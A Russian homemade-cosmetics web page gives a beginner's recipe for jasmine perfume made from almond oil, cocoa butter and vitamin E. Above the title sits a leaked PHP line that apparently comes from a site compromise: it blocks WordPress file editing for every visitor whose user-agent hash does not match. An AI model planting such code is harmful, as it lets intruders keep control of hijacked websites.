if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Духи с ароматом жасмина | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Рецепт, как сделать духи с ароматом жасмина

Парфюмерные средства, без которых многие люди не обходятся и дня, содержат немало токсичных веществ, которые оставляют негативные отпечатки не только на здоровье, но и на одежде. Ведь если аромат на одежде сохраняется после многочисленных стирок, стоит задуматься о вреде химикатов, содержащихся в любимых духах.

Пар­фю­мер­ные сред­ства, без кото­рых мно­гие люди не обхо­дят­ся и дня, содер­жат нема­ло ток­сич­ных веществ, кото­рые остав­ля­ют нега­тив­ные отпе­чат­ки не толь­ко на здо­ро­вье, но и на одеж­де. Ведь если аро­мат на одеж­де сохра­ня­ет­ся после мно­го­чис­лен­ных сти­рок, сто­ит заду­мать­ся о вре­де хими­ка­тов, содер­жа­щих­ся в люби­мых духах. Но это вовсе не повод отка­зы­вать себе в люби­мой пар­фю­ме­рии, ведь ее мож­но изго­то­вить само­сто­я­тель­но, при помо­щи нату­раль­ных компонентов.

Сего­дня я рас­ска­жу вам рецепт для начи­на­ю­щих пар­фю­ме­ров, с помо­щью кото­ро­го вы може­те сде­лать духи с аро­ма­том жас­ми­на сво­и­ми рука­ми. Спи­сок ингре­ди­ен­тов, кото­рые вам понадобятся:

  • Вита­мин Е – 2 шт. (в капсулах)
  • Мас­ло мин­даль­ное – 1\4 стакана
  • Мас­ло какао (твер­дое) – 4 ст. л.
  • Эфир­ное мас­ло жас­ми­на – от 14 капель (для более рез­ко­го аро­ма­та може­те уве­ли­чить дозу)

Вот сама про­це­ду­ра при­го­тов­ле­ния духов:

Шаг 1.

Орга­ни­че­ское мас­ло какао слег­ка под­мо­розь­те, что­бы потом было лег­че нате­реть на терке.

Шаг 2.

Пере­ме­шай­те мин­даль­ное и какао мас­ло до одно­род­ной консистенции.

Шаг 3.

Добавь­те вита­мин из кап­сул к полу­чен­ной сме­си, тща­тель­но перемешайте.

Шаг 4.

Жас­ми­но­вое мас­ло рав­но­мер­но нака­пай­те над сме­сью, что­бы затем при пере­ме­ши­ва­нии все ком­по­нен­ты пере­шли в одно­род­ную массу.

Шаг 5.

Рас­то­пи­те полу­чен­ную смесь на мелен­ном огне. Слиш­ком жид­кую смесь може­те под­гу­стить мас­лом какао. Если же смесь наобо­рот густая, раз­бавь­те ее мин­даль­ным маслом.

Шаг 6.

Осту­ди­те смесь и пере­лей­те в гер­ме­тич­ный фла­кон. Хоро­шень­ко встрях­ни­те его, и може­те при­сту­пать к исполь­зо­ва­нию нату­раль­ных домаш­них духов.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Katerinka666

Люблю все творческое и считаю что нет цены тому, что сделано своими руками! С удовольствием делюсь своими мастер-классами и пользуюсь чужими для совершенствования своих навыков! Читайте все мои записи!